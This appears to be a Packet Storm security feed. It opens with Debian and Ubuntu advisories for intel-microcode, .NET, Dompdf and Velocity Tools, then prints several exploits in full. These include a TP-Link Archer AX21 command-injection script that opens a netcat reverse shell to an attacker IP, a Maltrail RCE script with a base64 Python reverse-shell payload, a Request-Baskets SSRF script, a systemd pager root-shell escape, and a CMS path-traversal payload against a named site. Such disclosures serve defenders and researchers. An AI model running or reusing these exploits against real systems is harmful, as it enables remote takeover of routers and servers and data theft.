Debian Linux Security Advisory 5474-1 - This update ships updated CPU microcode for some types of Intel CPUs and provides mitigations for security vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5474-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
August 11, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : intel-microcode  
CVE ID         : CVE-2022-40982 CVE-2022-41804 CVE-2023-23908  
Debian Bug     : 1043305

This update ships updated CPU microcode for some types of Intel CPUs and  
provides mitigations for security vulnerabilities.

CVE-2022-40982

    Daniel Moghimi discovered Gather Data Sampling (GDS), a hardware  
    vulnerability which allows unprivileged speculative access to data  
    which was previously stored in vector registers.

    For details please refer to  
    <https://downfall.page/> and  
    <https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/gather-data-sampling.html>.

CVE-2022-41804

    Unauthorized error injection in Intel SGX or Intel TDX for some  
    Intel Xeon Processors which may allow a local user to potentially  
    escalate privileges.

CVE-2023-23908

    Improper access control in some 3rd Generation Intel Xeon Scalable  
    processors may result in an information leak.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 3.20230808.1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 3.20230808.1~deb12u1.

We recommend that you upgrade your intel-microcode packages.

For the detailed security status of intel-microcode please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/intel-microcode

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTV0BxfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RzLg//VXN+boskHdyaumxfcvnUf6pTh6ebU05fxKID1YmhXN155xmXDrVqkvvs  
5+qbGrNJUc89Ix2sLp/GlxC3sve4pnFe8jix/GrEN1bvc+bvDC565E6Ragcey1b+  
nB0viJZmhraXfB7VMjhlXG7Q2xxkXAYaJ5F3pvv2AWZt8/9P7We9KdQzxRpPXZSj  
0e5yVzRjo1elv2Mm6yDFNFXGc+dIxoBROSo7/6hIkPGtQyKMYdSYYmWJFQdf+szU  
4Z0lsFOGA6d1cri+I4RlxfsY3zIjZWANiKg7lR7dUzSO4q6j857zDHle2vpw5sTX  
kzXKID0am4dItKPH/gcX9lv5J8ozD2LMeebnUTmvOvBdAiVS1an5a2MI9TBo8VzL  
zdTqzwmQQHIjVY3mqVGnFupc5uxx2HStkMKHYXGyXOAapg2AecUDZrbD6rcg5kxY  
/CpSss3KHEpu8WosOCkYWhAbXOA7s6Wv6pZZ/qBtrjma2QwYK9dACL6Y2hRDIlEj  
e9X6fqc6Vqw0zosuenbnxypFJF27428Ev0ZOYKc9EdyxIVixAo2x5OnwOLyzpqaM  
f0X2DSyjCAc3zS+zxMpbRMtM8kCmz5V68RYWCzKBAZNsOmi2kWK7pkuaP1j9BEYB  
H/bo69fugJOSJppKi8GLwAnxLd7NqEXl6SBFP8CDfZJ9Rq8P1P4=  
=FLgQ  
-----END PGP SIGNATURE-----

Debian Security Advisory 5474-1

Ubuntu Security Notice 6278-2 - USN-6278-1 fixed several vulnerabilities in .NET. This update provides the corresponding updates for Ubuntu 22.04 LTS. It was discovered that .NET did properly handle the execution of certain commands. An attacker could possibly use this issue to achieve remote code execution.

==========================================================================  
Ubuntu Security Notice USN-6278-2  
August 10, 2023

dotnet6, dotnet7 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in .NET.

Software Description:  
- dotnet6: dotNET CLI tools and runtime  
- dotnet7: dotNET CLI tools and runtime

Details:

USN-6278-1 fixed several vulnerabilities in .NET. This update  
provides the corresponding updates for Ubuntu 22.04 LTS.

Original advisory details:

   It was discovered that .NET did properly handle the execution of  
   certain commands. An attacker could possibly use this issue to  
   achieve remote code execution. (CVE-2023-35390)

   Benoit Foucher discovered that .NET did not properly implement the  
   QUIC stream limit in HTTP/3. An attacker could possibly use this  
   issue to cause a denial of service. (CVE-2023-38178)

   It was discovered that .NET did not properly handle the disconnection  
   of potentially malicious clients interfacing with a Kestrel server. An  
   attacker could possibly use this issue to cause a denial of service.  
   (CVE-2023-38180)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
    aspnetcore-runtime-6.0           6.0.121-0ubuntu1~22.04.1  
    aspnetcore-runtime-7.0           7.0.110-0ubuntu1~22.04.1  
    dotnet-host 6.0.121-0ubuntu1~22.04.1  
    dotnet-host-7.0                       7.0.110-0ubuntu1~22.04.1  
    dotnet-hostfxr-6.0                   6.0.121-0ubuntu1~22.04.1  
    dotnet-hostfxr-7.0                   7.0.110-0ubuntu1~22.04.1  
    dotnet-runtime-6.0                  6.0.121-0ubuntu1~22.04.1  
    dotnet-runtime-7.0                  7.0.110-0ubuntu1~22.04.1  
    dotnet-sdk-6.0                        6.0.121-0ubuntu1~22.04.1  
    dotnet-sdk-7.0                        7.0.110-0ubuntu1~22.04.1  
    dotnet6 6.0.121-0ubuntu1~22.04.1  
    dotnet7 7.0.110-0ubuntu1~22.04.1

In general, a standard system update will make all the necessary changes.

References:  
    https://ubuntu.com/security/notices/USN-6278-2  
    https://ubuntu.com/security/notices/USN-6278-1  
    CVE-2023-35390, CVE-2023-38178, CVE-2023-38180

Package Information:  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.121-0ubuntu1~22.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.110-0ubuntu1~22.04.1

Ubuntu Security Notice USN-6278-2

Ubuntu Security Notice 6277-2 - USN-6277-1 fixed vulnerabilities in Dompdf. This update provides the corresponding updates for Ubuntu 22.04 LTS. It was discovered that Dompdf was not properly validating untrusted input when processing HTML content under certain circumstances. An attacker could possibly use this issue to expose sensitive information or execute arbitrary code. This issue only affected Ubuntu 16.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6277-2  
August 10, 2023

php-dompdf vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in Dompdf.

Software Description:  
- php-dompdf: HTML to PDF converter

Details:

USN-6277-1 fixed vulnerabilities in Dompdf. This update provides the  
corresponding updates for Ubuntu 22.04 LTS.

Original advisory details:

  It was discovered that Dompdf was not properly validating untrusted input when  
  processing HTML content under certain circumstances. An attacker could  
  possibly use this issue to expose sensitive information or execute arbitrary  
  code. This issue only affected Ubuntu 16.04 LTS.  
  (CVE-2014-5011, CVE-2014-5012, CVE-2014-5013)

  It was discovered that Dompdf was not properly validating processed HTML  
  content that referenced PHAR files, which could result in the deserialization  
  of untrusted data. An attacker could possibly use this issue to execute  
  arbitrary code. (CVE-2021-3838)

  It was discovered that Dompdf was not properly validating processed HTML  
  content that referenced both a remote base and a local file, which could  
  result in the bypass of a chroot check. An attacker could possibly use this  
  issue to expose sensitive information. (CVE-2022-2400)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   php-dompdf                      0.6.2+dfsg-3.1ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6277-2  
   https://ubuntu.com/security/notices/USN-6277-1  
   CVE-2021-3838, CVE-2022-2400

Package Information:  
https://launchpad.net/ubuntu/+source/php-dompdf/0.6.2+dfsg-3.1ubuntu0.1

Ubuntu Security Notice USN-6277-2

Ubuntu Security Notice 6282-1 - Jackson Henry discovered that Velocity Tools incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6282-1  
August 10, 2023

velocity-tools vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Velocity Tools could be made to run arbitrary code if it opened a specially  
crafted file.

Software Description:  
- velocity-tools: A subproject of the Apache Velocity project

Details:

Jackson Henry discovered that Velocity Tools incorrectly handled certain  
inputs. If a user or an automated system were tricked into opening a specially  
crafted input file, a remote attacker could possibly use this issue to execute  
arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   libvelocity-tools-java          2.0-7ubuntu0.20.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   libvelocity-tools-java          2.0-7ubuntu0.18.04.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libvelocity-tools-java          2.0-4ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6282-1  
   CVE-2020-13959

Package Information:  
   https://launchpad.net/ubuntu/+source/velocity-tools/2.0-7ubuntu0.20.04.1

Ubuntu Security Notice USN-6282-1

TP-Link Archer AX21 suffers from an unauthenticated remote command injection vulnerability.

    #!/usr/bin/python3# # Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection# Date: 07/25/2023# Exploit Author: Voyag3r (https://github.com/Voyag3r-Security)# Vendor Homepage: https://www.tp-link.com/us/# Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389)# Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0# CVE: CVE-2023-1389## Disclaimer: This script is intended to be used for educational purposes only.# Do not run this against any system that you do not have permission to test. # The author will not be held responsible for any use or damage caused by this # program. # # CVE-2023-1389 is an unauthenticated command injection vulnerability in the web# management interface of the TP-Link Archer AX21 (AX1800), specifically, in the# *country* parameter of the *write* callback for the *country* form at the # "/cgi-bin/luci/;stok=/locale" endpoint. By modifying the country parameter it is # possible to run commands as root. Execution requires sending the request twice;# the first request sets the command in the *country* value, and the second request # (which can be identical or not) executes it. # # This script is a short proof of concept to obtain a reverse shell. To read more # about the development of this script, you can read the blog post here:# https://medium.com/@voyag3r-security/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94# Before running the script, start a nc listener on your preferred port -> run the script -> profitimport requests, urllib.parse, argparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarning# Suppress warning for connecting to a router with a self-signed certificaterequests.packages.urllib3.disable_warnings(InsecureRequestWarning)# Take user input for the router IP, and attacker IP and portparser = argparse.ArgumentParser()parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name")parser.add_argument("-a", "--attacker", dest = "attacker", default = "127.0.0.1", help="Attacker IP")parser.add_argument("-p", "--port",dest = "port", default = "9999", help="Local port")args = parser.parse_args()# Generate the reverse shell command with the attacker IP and portrevshell = urllib.parse.quote("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + args.attacker + " " + args.port + " >/tmp/f")# URL to obtain the reverse shellurl_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")"# Send the URL twice to run the command. Sending twice is necessary for the attackr = requests.get(url_command, verify=False)r = requests.get(url_command, verify=False)

TP-Link Archer AX21 Command Injection

systemd version 246 suffers from a local root privilege escalation vulnerability.

    # Exploit Title: systemd 246 - Local Privilege Escalation# Exploit Author: Iyaad Luqman K (init_6)# Application: systemd 246# Tested on: Ubuntu 22.04# CVE: CVE-2023-26604systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user. This vulnerability allows a local attacker to gain root privileges.## Proof Of Concept:1. Run the systemctl command which can be run as root user.sudo /usr/bin/systemctl status any_service2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands.3. Type in `!/bin/sh` in the pager to spawn a shell as root user.

systemd 246 Local Root Privilege Escalation

Maltrail version 0.53 suffers from an unauthenticated remote code execution vulnerability.

    # Exploit Title: Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)# Exploit Author: Iyaad Luqman K (init_6)# Application: Maltrail v0.53# Tested on: Ubuntu 22.04# CVE: CVE-2023-27163# PoCimport sys;import os;import base64;def main():  listening_IP = None  listening_PORT = None  target_URL = None  if len(sys.argv) != 4:    print("Error. Needs listening IP, PORT and target URL.")    return(-1)    listening_IP = sys.argv[1]  listening_PORT = sys.argv[2]  target_URL = sys.argv[3] + "/login"  print("Running exploit on " + str(target_URL))  curl_cmd(listening_IP, listening_PORT, target_URL)def curl_cmd(my_ip, my_port, target_url):  payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''  encoded_payload = base64.b64encode(payload.encode()).decode()  # encode the payload in Base64  command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"  os.system(command)if __name__ == "__main__":  main()

Maltrail 0.53 Remote Code Execution

Request-Baskets version 1.2.1 suffers from a server-side request forgery vulnerability.

    # Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)# Exploit Author: Iyaad Luqman K (init_6)# Application: Request-Baskets v1.2.1# Tested on: Ubuntu 22.04# CVE: CVE-2023-27163# PoC#!/bin/bashif [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then    help="Usage: exploit.sh <URL> <TARGET>\n\n";    help+="Arguments:\n" \    help+=" URL            main path (/) of the server (eg. http://127.0.0.1:5000/)\n";    help+=" TARGET";    echo -e "$help";    exit 1;fiURL=$1ATTACKER_SERVER=$2if [ "${URL: -1}" != "/" ]; then    URL="$URL/";fi;BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c "6");API_URL="$URL""api/baskets/$BASKET_NAME";PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";echo "> Creating the \"$BASKET_NAME\" proxy basket...";if ! response=$(curl -s -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then    echo "> FATAL: Could not properly request $API_URL. Is the server online?";    exit 1;fi;BASKET_URL="$URL$BASKET_NAME";echo "> Basket created!";echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER.";if ! jq --help 1>/dev/null; then    echo "> Response body (Authorization): $response";else    echo "> Authorization: $(echo "$response" | jq -r ".token")";fi;exit 0;

Request-Baskets 1.2.1 Server-Side Request Forgery

OutSystems Service Studio version 11.53.30 suffers from a dll hijacking vulnerability.

    # Exploit Title: OutSystems Service Studio 11.53.30 - DLL Hijacking# Date: 2023-08-09# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia# Vendor Homepage: https://www.outsystems.com/# Version: Up to 11.53.30 (Build 61739)# Tested on: Windows# CVE : CVE-2022-47636A DLL hijacking vulnerability has been discovered in OutSystems Service Studio 11 11.53.30 build 61739.When a user open a .oml file (OutSystems Modeling Language), the application will load the following DLLs from the same directory:av_libGLESv2.dlllibcef.DLLuser32.dlld3d10warp.dllUsing a crafted DLL, it is possible to execute arbitrary code in the context of the current logged in user.

OutSystems Service Studio 11.53.30 DLL Hijacking

i2soft CMS version 2.0 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : i2soft CMS v2.0 Insecure Direct Object Reference Vulnerability                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.i2softbd.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload 1 : /Admin/menu.php[+] use payload 2 : Admin/container.php?p=../footer.html[+] now you can modify footer page or read other files[+] https://wtaazakhobor24com/Admin/container.php?p=../footer.htmlGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Source

Packet Storm